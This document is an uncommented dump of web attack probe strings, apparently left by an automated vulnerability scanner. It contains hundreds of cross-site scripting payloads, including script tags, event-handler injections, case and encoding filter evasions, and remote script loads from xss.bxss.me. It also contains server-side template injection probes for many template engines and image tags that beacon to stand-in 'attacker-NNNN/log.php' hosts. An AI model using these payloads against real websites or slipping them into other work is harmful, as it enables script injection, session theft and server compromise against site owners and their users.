555<img src=xyz OnErRor=L3XA(9816)>

555\u003CScRiPt\jvkx(9917)\u003C/sCripT\u003E

555'"()&%<zzz><ScRiPt >2qvR(9687)</ScRiPt>

555<img src=xyz OnErRor=4ZJJ(9472)>

555<aTxLtIa x=9111>

555<ScR<ScRiPt>IpT>KWhB(9656)</sCr<ScRiPt>IpT>

555'"()&%<zzz><ScRiPt >EPf2(9449)</ScRiPt>

555<img/src=">" onerror=alert(9515)>

555<img/src=">" onerror=alert(9191)>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=cUQY(97871) //\xf6>

555<ae7UpgC<

'}}dfb{{98991*97996}}xca

555&lt

555\u003CScRiPt\w4HO(9371)\u003C/sCripT\u003E

555<img src=//xss.bxss.me/t/dot.gif onload=ozx5(9561)>

'"()&%<zzz><ScRiPt >2qvR(9075)</ScRiPt>

555&lt

555<ScRiPt >KWhB(9437)</ScRiPt>

dfb__${98991*97996}__::.x

'"()&%<zzz><ScRiPt >EPf2(9770)</ScRiPt>

\xf6<img zzz onmouseover=jvkx(93191) //\xf6>

555<input autofocus onfocus=cUQY(9943)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%34%5A%4A%4A%289666%29%3C%2F%73%43%72%69%70%54%3E

'%}dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%4C%33%58%41%289295%29%3C%2F%73%43%72%69%70%54%3E

555<img sRc='http://attacker-9869/log.php?

<a HrEF=http://xss.bxss.me></a>

555<img src=xyz OnErRor=ozx5(9396)>

5559023226

555\u003CScRiPt\4ZJJ(9147)\u003C/sCripT\u003E

'}dfb{98991*97996}xca

555<ScRiPt >BiE9(9774)</ScRiPt>

\xf6<img zzz onmouseover=w4HO(96651) //\xf6>

<a HrEF=jaVaScRiPT:>

'}dfb${98991*97996}xca

bfg7450\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7450

555<img/src=">" onerror=alert(9308)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\u003CScRiPt\L3XA(9587)\u003C/sCripT\u003E

555<aSqxlBV<

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9650></ScRiPt>

555&lt

555<input autofocus onfocus=jvkx(9778)>

555<input autofocus onfocus=w4HO(9548)>

5559979517

'}dfb#{98991*97996}xca

555<WSWABI>AQCLH[!+!]</WSWABI>

555}body{zzz:Expre/**/SSion(cUQY(9554))}

555<ScRiPt >KWhB(9510)</ScRiPt>

555'"()&%<zzz><ScRiPt >UP8V(9424)</ScRiPt>

555<ScRiPt >4Klp(9651)</ScRiPt>

bfgx7900\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7900

555&lt

<a HrEF=http://xss.bxss.me></a>

\xf6<img zzz onmouseover=4ZJJ(91431) //\xf6>

\xf6<img zzz onmouseover=L3XA(90911) //\xf6>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%7A%78%35%289247%29%3C%2F%73%43%72%69%70%54%3E

555<script>BiE9(9190)</script>

bfg3212\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3212

'}dfb{#98991*97996}xca

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

555XA48f <ScRiPt >cUQY(9914)</ScRiPt>

'"()&%<zzz><ScRiPt >UP8V(9767)</ScRiPt>

555<svg \xa0onload=KWhB(9968)

555<input autofocus onfocus=L3XA(9048)>

<a HrEF=jaVaScRiPT:>

555<WFTAFF>XNDRM[!+!]</WFTAFF>

bfgx8773\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8773

555\u003CScRiPt\ozx5(9401)\u003C/sCripT\u003E

555<input autofocus onfocus=4ZJJ(9454)>

<%={{={@{#{${dfb}}%>

555<WTR0D3>AMU3J[!+!]</WTR0D3>

<a HrEF=http://xss.bxss.me></a>

555<ScR<ScRiPt>IpT>BiE9(9792)</sCr<ScRiPt>IpT>

'}dfb{@98991*97996}xca

555<isindex type=image src=1 onerror=KWhB(9148)>

555}body{zzz:Expre/**/SSion(w4HO(9967))}

5559200087

555<script>4Klp(9622)</script>

555&lt

<%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(jvkx(9658))}

'}}dfb{{=98991*97996}}xca

555<iframe src='data:text/html

555

555<ifRAme sRc=9937.com></IfRamE>

555<ScRiPt >BiE9(9996)</ScRiPt>

555VlYH8 <ScRiPt >w4HO(9063)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555GaUPj <ScRiPt >jvkx(9577)</ScRiPt>

555<ScR<ScRiPt>IpT>4Klp(9829)</sCr<ScRiPt>IpT>

555<aqrGQVq x=9444>

555<body onload=KWhB(9561)>

')dfb@(98991*97996)xca

bfg7071\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7071

<th:t="${dfb}#foreach

555

555<WDJ1SF>UB7RP[!+!]</WDJ1SF>

\xf6<img zzz onmouseover=ozx5(91701) //\xf6>

555}body{zzz:Expre/**/SSion(4ZJJ(9382))}

555}body{zzz:Expre/**/SSion(L3XA(9350))}

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9672></ScRiPt>

'%>dfb<%=98991*97996%>xca

555<WFXOL7>WCKUI[!+!]</WFXOL7>

555<img src=//xss.bxss.me/t/dot.gif onload=KWhB(9479)>

555<ScRiPt >4Klp(9442)</ScRiPt>

555<img sRc='http://attacker-9385/log.php?

bfgx6246\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6246

555

555<img src=xyz OnErRor=KWhB(9236)>

555v7xSm <ScRiPt >L3XA(9408)</ScRiPt>

555<ifRAme sRc=9997.com></IfRamE>

<th:t="${dfb}#foreach

555<input autofocus onfocus=ozx5(9113)>

'}dfb#set($x=98991*97996)${x}xca

555<ifRAme sRc=9307.com></IfRamE>

555<ScRiPt >BiE9(9891)</ScRiPt>

555Dgewo <ScRiPt >4ZJJ(9033)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<aJ2KJFJ x=9484>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9401></ScRiPt>

555<ahrCeNp<

<%={{={@{#{${dfb}}%>

555

<a HrEF=http://xss.bxss.me></a>

555<WCOLKX>CKGRM[!+!]</WCOLKX>

555<WEUTHP>NXK7R[!+!]</WEUTHP>

555<img/src=">" onerror=alert(9396)>

555

555<svg \xa0onload=BiE9(9570)

'}dfb{{"abc"|title}}xca

555<abQ2CAO x=9529>

dfb{{98991*97996}}xca

555<ifRAme sRc=9115.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<ScRiPt >4Klp(9924)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9032/log.php?

<th:t="${dfb}#foreach

%35%35%35%3C%53%63%52%69%50%74%20%3E%4B%57%68%42%289000%29%3C%2F%73%43%72%69%70%54%3E

'print("dfb" . 98991*97996 . "xca")

555<aPMHpJP x=9908>

555<isindex type=image src=1 onerror=BiE9(9254)>

555<ifRAme sRc=9886.com></IfRamE>

555<img sRc='http://attacker-9170/log.php?

555

555<aIqh0eI<

555}body{zzz:Expre/**/SSion(ozx5(9427))}

dfb[[${98991*97996}]]xca

555<svg \xa0onload=4Klp(9271)

555<img sRc='http://attacker-9217/log.php?

555\u003CScRiPt\KWhB(9425)\u003C/sCripT\u003E

555

555<aplUxeL x=9065>

'98991*97996*98991*97996

dfb{{98991*97996}}xca

555<alqgeq9<

dfb__${98991*97996}__::.x

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555xUkih <ScRiPt >ozx5(9825)</ScRiPt>

555<isindex type=image src=1 onerror=4Klp(9696)>

555&lt

555<aCF8DLM<

555<img sRc='http://attacker-9659/log.php?

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<body onload=BiE9(9308)>

\xf6<img zzz onmouseover=KWhB(92051) //\xf6>

555

dfb[[${98991*97996}]]xca

'}}}dfb{{{this}}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<input autofocus onfocus=KWhB(9625)>

555<a1L541Q<

555<iframe src='data:text/html

555<WPBUKV>28NT4[!+!]</WPBUKV>

555<img src=//xss.bxss.me/t/dot.gif onload=BiE9(9995)>

dfb__${98991*97996}__::.x

dfb{{98991*97996}}xca

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >2qvR(9903)</ScRiPt>

'}#{98991*97996*98991*97996}

555<ifRAme sRc=9204.com></IfRamE>

555<body onload=4Klp(9757)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<W6GKYG>8LPMC[!+!]</W6GKYG>

<a HrEF=jaVaScRiPT:>

555<img src=xyz OnErRor=BiE9(9317)>

'}dfb#{xca}=123

dfb[[${98991*97996}]]xca

555<a8p7F0P x=9177>

555<img src=//xss.bxss.me/t/dot.gif onload=4Klp(9327)>

555<ScRiPt >EPf2(9578)</ScRiPt>

555<script>2qvR(9153)</script>

555}body{zzz:Expre/**/SSion(KWhB(9817))}

'}}dfb{{'abcd'.toUpperCase()}}xca

dfb__${98991*97996}__::.x

555<WPQZLJ>8PO1Q[!+!]</WPQZLJ>

555<img sRc='http://attacker-9199/log.php?

555TvbPZ <ScRiPt >KWhB(9263)</ScRiPt>

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<ScR<ScRiPt>IpT>2qvR(9436)</sCr<ScRiPt>IpT>

555<img/src=">" onerror=alert(9196)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=xyz OnErRor=4Klp(9506)>

'}}dfb{{98991*97996}}xca

555<WTM3L5>RWOLQ[!+!]</WTM3L5>

555<ScRiPt >UP8V(9358)</ScRiPt>

555<aKklBD0<

%35%35%35%3C%53%63%52%69%50%74%20%3E%42%69%45%39%289179%29%3C%2F%73%43%72%69%70%54%3E

555<script>EPf2(9571)</script>

555<ScRiPt >2qvR(9781)</ScRiPt>

555<img/src=">" onerror=alert(9610)>

555<ifRAme sRc=9860.com></IfRamE>

555\u003CScRiPt\BiE9(9288)\u003C/sCripT\u003E

'}dfb[[${98991*97996}]]xca

555<WXNMJK>FYYPM[!+!]</WXNMJK>

555<ScR<ScRiPt>IpT>EPf2(9197)</sCr<ScRiPt>IpT>

%35%35%35%3C%53%63%52%69%50%74%20%3E%34%4B%6C%70%289393%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >EPf2(9271)</ScRiPt>

555<a7LfLPg x=9923>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9292></ScRiPt>

555<script>UP8V(9656)</script>

555&lt

555\u003CScRiPt\4Klp(9953)\u003C/sCripT\u003E

'dfb__${98991*97996}__::.x

555<img sRc='http://attacker-9286/log.php?

555<ScR<ScRiPt>IpT>UP8V(9811)</sCr<ScRiPt>IpT>

555<ScRiPt >2qvR(9445)</ScRiPt>

555&lt

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

\xf6<img zzz onmouseover=BiE9(96981) //\xf6>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9043></ScRiPt>

555<a6PV0UO<

555<ScRiPt >UP8V(9115)</ScRiPt>

\xf6<img zzz onmouseover=4Klp(96061) //\xf6>

555<svg \xa0onload=2qvR(9076)

555<input autofocus onfocus=BiE9(9156)>

555<ScRiPt >EPf2(9718)</ScRiPt>

1}}dfb{{98991*97996}}xca

555<input autofocus onfocus=4Klp(9404)>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9357></ScRiPt>

555<isindex type=image src=1 onerror=2qvR(9952)>

555<svg \xa0onload=EPf2(9771)

1%}dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

555<iframe src='data:text/html

555<isindex type=image src=1 onerror=EPf2(9706)>

1}dfb{98991*97996}xca

555<ScRiPt >UP8V(9118)</ScRiPt>

555'"()&%<zzz><ScRiPt >oPT1(9675)</ScRiPt>

555}body{zzz:Expre/**/SSion(BiE9(9289))}

555<body onload=2qvR(9812)>

555<iframe src='data:text/html

1}dfb${98991*97996}xca

555<svg \xa0onload=UP8V(9192)

<a HrEF=jaVaScRiPT:>

55584jP5 <ScRiPt >BiE9(9254)</ScRiPt>

'"()&%<zzz><ScRiPt >oPT1(9132)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=2qvR(9676)>

555<body onload=EPf2(9245)>

1}dfb#{98991*97996}xca

555}body{zzz:Expre/**/SSion(4Klp(9332))}

555rShHD <ScRiPt >4Klp(9913)</ScRiPt>

555<img src=xyz OnErRor=2qvR(9348)>

1}dfb{#98991*97996}xca

555<img src=//xss.bxss.me/t/dot.gif onload=EPf2(9888)>

5559016518

555<isindex type=image src=1 onerror=UP8V(9887)>

555'"()&%<zzz><ScRiPt >iqtC(9809)</ScRiPt>

555<WZ1WOS>9DYAQ[!+!]</WZ1WOS>

bfg8902\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8902

555<img/src=">" onerror=alert(9327)>

1}dfb{@98991*97996}xca

555<img src=xyz OnErRor=EPf2(9821)>

555<iframe src='data:text/html

555<WUP2VF>D2AXW[!+!]</WUP2VF>

555<img/src=">" onerror=alert(9019)>

1}}dfb{{=98991*97996}}xca

bfgx9416\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9416

'"()&%<zzz><ScRiPt >iqtC(9061)</ScRiPt>

555<ifRAme sRc=9210.com></IfRamE>

%35%35%35%3C%53%63%52%69%50%74%20%3E%32%71%76%52%289065%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%45%50%66%32%289691%29%3C%2F%73%43%72%69%70%54%3E

1)dfb@(98991*97996)xca

<%={{={@{#{${dfb}}%>

555<body onload=UP8V(9817)>

555<ifRAme sRc=9350.com></IfRamE>

555<aHJPuRW x=9738>

1%>dfb<%=98991*97996%>xca

555

555\u003CScRiPt\EPf2(9909)\u003C/sCripT\u003E

555<img src=//xss.bxss.me/t/dot.gif onload=UP8V(9841)>

555<img sRc='http://attacker-9515/log.php?

555\u003CScRiPt\2qvR(9948)\u003C/sCripT\u003E

555<aUEP98L x=9686>

5559575460

555<img src=xyz OnErRor=UP8V(9851)>

555&lt

bfg1252\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1252

555<aDBLsbh<

555<img sRc='http://attacker-9181/log.php?

555<img/src=">" onerror=alert(9461)>

1}dfb#set($x=98991*97996)${x}xca

<th:t="${dfb}#foreach

555'"()&%<zzz><ScRiPt >GkuJ(9686)</ScRiPt>

\xf6<img zzz onmouseover=EPf2(90421) //\xf6>

555'"()&%<zzz><ScRiPt >HRhX(9165)</ScRiPt>

555&lt

555

bfgx7855\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7855

555<acC8QVN<

1}dfb{{"abc"|title}}xca

555<input autofocus onfocus=EPf2(9439)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1print("dfb" . 98991*97996 . "xca")

<%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

555

198991*97996*98991*97996

555

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

1}dfb{@math key=98991 method="multiply" operand=97996/}xca

555}body{zzz:Expre/**/SSion(EPf2(9348))}

<th:t="${dfb}#foreach

1}}}dfb{{{this}}}xca

555KEIcz <ScRiPt >EPf2(9574)</ScRiPt>

dfb[[${98991*97996}]]xca

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%55%50%38%56%289040%29%3C%2F%73%43%72%69%70%54%3E

555<WZZQPV>F4IW2[!+!]</WZZQPV>

555<ifRAme sRc=9924.com></IfRamE>

1}#{98991*97996*98991*97996}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555\u003CScRiPt\UP8V(9389)\u003C/sCripT\u003E

dfb__${98991*97996}__::.x

555<ajItROi x=9634>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img sRc='http://attacker-9082/log.php?

555&lt

1}dfb#{xca}=123

555

555<ScRiPt >oPT1(9157)</ScRiPt>

555<aKSKSzJ<

\xf6<img zzz onmouseover=UP8V(94711) //\xf6>

1}}dfb{{'abcd'.toUpperCase()}}xca

'"()&%<zzz><ScRiPt >GkuJ(9175)</ScRiPt>

'"()&%<zzz><ScRiPt >HRhX(9481)</ScRiPt>

\xf6<img zzz onmouseover=2qvR(96581) //\xf6>

dfb{{98991*97996}}xca

5559629287

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<W0LELP>NYZTV[!+!]</W0LELP>

5559494293

555<input autofocus onfocus=2qvR(9654)>

555<input autofocus onfocus=UP8V(9470)>

1}}dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

555<script>oPT1(9672)</script>

<a HrEF=http://xss.bxss.me></a>

bfg8301\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8301

bfg9823\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9823

1}dfb[[${98991*97996}]]xca

<a HrEF=jaVaScRiPT:>

bfgx5551\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5551

bfgx3137\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3137

1dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(UP8V(9435))}

555<ScR<ScRiPt>IpT>oPT1(9517)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

<%={{={@{#{${dfb}}%>

555

555ksyQo <ScRiPt >UP8V(9382)</ScRiPt>

555<ScRiPt >oPT1(9457)</ScRiPt>

1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555}body{zzz:Expre/**/SSion(2qvR(9839))}

<th:t="${dfb}#foreach

555<ScRiPt >idwO(9072)</ScRiPt>

555<WQJW9J>WI5DN[!+!]</WQJW9J>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9156></ScRiPt>

dfb{{98991*97996}}xca

555h7iXM <ScRiPt >2qvR(9460)</ScRiPt>

555<ScRiPt >iqtC(9990)</ScRiPt>

555

555<WL2KNG>JIHJB[!+!]</WL2KNG>

555<ifRAme sRc=9623.com></IfRamE>

dfb{{98991*97996}}xca

555<ScRiPt >oPT1(9034)</ScRiPt>

555<WVHMRB>VYBVM[!+!]</WVHMRB>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<script>idwO(9165)</script>

dfb{98991*97996}xca

555<ar1Wys3 x=9655>

555<svg \xa0onload=oPT1(9053)

555<WQSFPR>S9EDM[!+!]</WQSFPR>

555<ScR<ScRiPt>IpT>idwO(9268)</sCr<ScRiPt>IpT>

555

dfb${98991*97996}xca

555<script>iqtC(9326)</script>

555<img sRc='http://attacker-9207/log.php?

555<ifRAme sRc=9642.com></IfRamE>

555<isindex type=image src=1 onerror=oPT1(9502)>

555<ScRiPt >idwO(9437)</ScRiPt>

dfb#{98991*97996}xca

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9665></ScRiPt>

555<ayWAiEy<

555<aZPvWBi x=9791>

555<iframe src='data:text/html

555<ScR<ScRiPt>IpT>iqtC(9718)</sCr<ScRiPt>IpT>

555'"()&%<zzz><ScRiPt >GzNg(9254)</ScRiPt>

dfb[[${98991*97996}]]xca

555<body onload=oPT1(9353)>

555<ScRiPt >idwO(9389)</ScRiPt>

dfb{#98991*97996}xca

555<ScRiPt >iqtC(9378)</ScRiPt>

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >BVmy(9374)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=oPT1(9009)>

dfb{@98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'"()&%<zzz><ScRiPt >GzNg(9351)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9940></ScRiPt>

'"()&%<zzz><ScRiPt >BVmy(9067)</ScRiPt>

555<img sRc='http://attacker-9753/log.php?

555<img src=xyz OnErRor=oPT1(9308)>

dfb{{=98991*97996}}xca

5559616497

555<svg \xa0onload=idwO(9285)

555<ScRiPt >HRhX(9814)</ScRiPt>

555<a8HvfwC<

bfg2751\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2751

555<isindex type=image src=1 onerror=idwO(9212)>

555<WB1PGA>TWPJT[!+!]</WB1PGA>

5559844547

555<ScRiPt >iqtC(9299)</ScRiPt>

dfb@(98991*97996)xca

555<img/src=">" onerror=alert(9210)>

bfgx4063\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4063

555<script>HRhX(9060)</script>

555<iframe src='data:text/html

555<svg \xa0onload=iqtC(9711)

bfg2645\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2645

dfb<%=98991*97996%>xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%50%54%31%289769%29%3C%2F%73%43%72%69%70%54%3E

<%={{={@{#{${dfb}}%>

dfb#set($x=98991*97996)${x}xca

555\u003CScRiPt\oPT1(9666)\u003C/sCripT\u003E

555<ScR<ScRiPt>IpT>HRhX(9836)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=iqtC(9178)>

555<body onload=idwO(9920)>

bfgx9696\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9696

dfb{{"abc"|title}}xca

555&lt

555

555<ScRiPt >HRhX(9781)</ScRiPt>

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=idwO(9434)>

<%={{={@{#{${dfb}}%>

print("dfb" . 98991*97996 . "xca")

\xf6<img zzz onmouseover=oPT1(91011) //\xf6>

<th:t="${dfb}#foreach

555<body onload=iqtC(9371)>

555<img src=xyz OnErRor=idwO(9031)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9678></ScRiPt>

98991*97996*98991*97996

555

555<input autofocus onfocus=oPT1(9588)>

555

555<img/src=">" onerror=alert(9942)>

555<ScRiPt >HRhX(9845)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=iqtC(9775)>

dfb{@math key=98991 method="multiply" operand=97996/}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

<th:t="${dfb}#foreach

%35%35%35%3C%53%63%52%69%50%74%20%3E%69%64%77%4F%289207%29%3C%2F%73%43%72%69%70%54%3E

555<svg \xa0onload=HRhX(9263)

555

<a HrEF=jaVaScRiPT:>

555<img src=xyz OnErRor=iqtC(9725)>

dfb{{{this}}}xca

dfb{{98991*97996}}xca

555

555<isindex type=image src=1 onerror=HRhX(9125)>

555}body{zzz:Expre/**/SSion(oPT1(9333))}

555<img/src=">" onerror=alert(9494)>

555\u003CScRiPt\idwO(9516)\u003C/sCripT\u003E

555MJS11 <ScRiPt >oPT1(9357)</ScRiPt>

555&lt

%35%35%35%3C%53%63%52%69%50%74%20%3E%69%71%74%43%289182%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

#{98991*97996*98991*97996}

\xf6<img zzz onmouseover=idwO(95351) //\xf6>

555\u003CScRiPt\iqtC(9788)\u003C/sCripT\u003E

555

555<iframe src='data:text/html

555<WUKYXK>QAGZI[!+!]</WUKYXK>

555<body onload=HRhX(9514)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb#{xca}=123

dfb{{98991*97996}}xca

555<input autofocus onfocus=idwO(9231)>

555&lt

555'"()&%<zzz><ScRiPt >5bDH(9978)</ScRiPt>

555<ifRAme sRc=9334.com></IfRamE>

555'"()&%<zzz><ScRiPt >zcb4(9307)</ScRiPt>

dfb{{'abcd'.toUpperCase()}}xca

555<ScRiPt >GzNg(9179)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=HRhX(9820)>

\xf6<img zzz onmouseover=iqtC(97171) //\xf6>

dfb[[${98991*97996}]]xca

'"()&%<zzz><ScRiPt >5bDH(9835)</ScRiPt>

555<img src=xyz OnErRor=HRhX(9793)>

<a HrEF=http://xss.bxss.me></a>

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<WPNAQS>ZVZYH[!+!]</WPNAQS>

dfb__${98991*97996}__::.x

'"()&%<zzz><ScRiPt >zcb4(9908)</ScRiPt>

555<input autofocus onfocus=iqtC(9941)>

555<aGJolyw x=9639>

555<script>GzNg(9674)</script>

5559954540

555<img/src=">" onerror=alert(9854)>

dfb{{98991*97996}}xca

5559939804

<a HrEF=jaVaScRiPT:>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=http://xss.bxss.me></a>

bfg9659\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9659

%35%35%35%3C%53%63%52%69%50%74%20%3E%48%52%68%58%289817%29%3C%2F%73%43%72%69%70%54%3E

bfg9447\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9447

dfb[[${98991*97996}]]xca

<a HrEF=jaVaScRiPT:>

555<al3gE3c<

555<ScRiPt >BVmy(9244)</ScRiPt>

dfb__${98991*97996}__::.x

bfgx7329\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7329

555\u003CScRiPt\HRhX(9268)\u003C/sCripT\u003E

bfgx8824\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8824

555}body{zzz:Expre/**/SSion(idwO(9436))}

555<ScRiPt >GzNg(9387)</ScRiPt>

555}body{zzz:Expre/**/SSion(iqtC(9754))}

<%={{={@{#{${dfb}}%>

555&lt

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555'"()&%<zzz><ScRiPt >MNTL(9648)</ScRiPt>

555'"()&%<zzz><ScRiPt >UKHL(9183)</ScRiPt>

<%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

'"()&%<zzz><ScRiPt >MNTL(9178)</ScRiPt>

555<WGJTYS>WBOM8[!+!]</WGJTYS>

555KO2bT <ScRiPt >idwO(9137)</ScRiPt>

\xf6<img zzz onmouseover=HRhX(92821) //\xf6>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9053></ScRiPt>

555

'"()&%<zzz><ScRiPt >UKHL(9598)</ScRiPt>

555<ScRiPt >GkuJ(9284)</ScRiPt>

555<script>BVmy(9743)</script>

555<WC6B0H>IT2OT[!+!]</WC6B0H>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<input autofocus onfocus=HRhX(9988)>

555<WP1PES>R3HDW[!+!]</WP1PES>

5559105870

<th:t="${dfb}#foreach

5559406516

555<WKLUDE>815GC[!+!]</WKLUDE>

555<ScR<ScRiPt>IpT>BVmy(9932)</sCr<ScRiPt>IpT>

555<ScRiPt >GzNg(9292)</ScRiPt>

555'"()&%<zzz><ScRiPt >sJ1N(9802)</ScRiPt>

555<script>GkuJ(9037)</script>

555<ifRAme sRc=9090.com></IfRamE>

555

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >BVmy(9737)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ifRAme sRc=9638.com></IfRamE>

555<svg \xa0onload=GzNg(9012)

'"()&%<zzz><ScRiPt >sJ1N(9008)</ScRiPt>

bfg3352\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3352

bfg7169\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7169

555<ScR<ScRiPt>IpT>GkuJ(9218)</sCr<ScRiPt>IpT>

"}}dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555

5559009641

555<anewghS x=9148>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9478></ScRiPt>

"%}dfb{{98991*97996}}xca

555<isindex type=image src=1 onerror=GzNg(9116)>

bfgx5320\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5320

555<ScRiPt >GkuJ(9573)</ScRiPt>

555}body{zzz:Expre/**/SSion(HRhX(9916))}

"}}dfb{{98991*97996}}xca

555<img sRc='http://attacker-9878/log.php?

bfg2803\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2803

bfgx2242\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2242

555<img sRc='http://attacker-9969/log.php?

"}dfb{98991*97996}xca

555<ScRiPt >BVmy(9633)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9449></ScRiPt>

<%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555FjiBZ <ScRiPt >HRhX(9868)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<body onload=GzNg(9893)>

555<adMD6AT<

555<svg \xa0onload=BVmy(9374)

"}dfb${98991*97996}xca

bfgx5947\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5947

555<axc1Ex1<

"%}dfb{{98991*97996}}xca

555<W9QKNP>SEDQM[!+!]</W9QKNP>

555

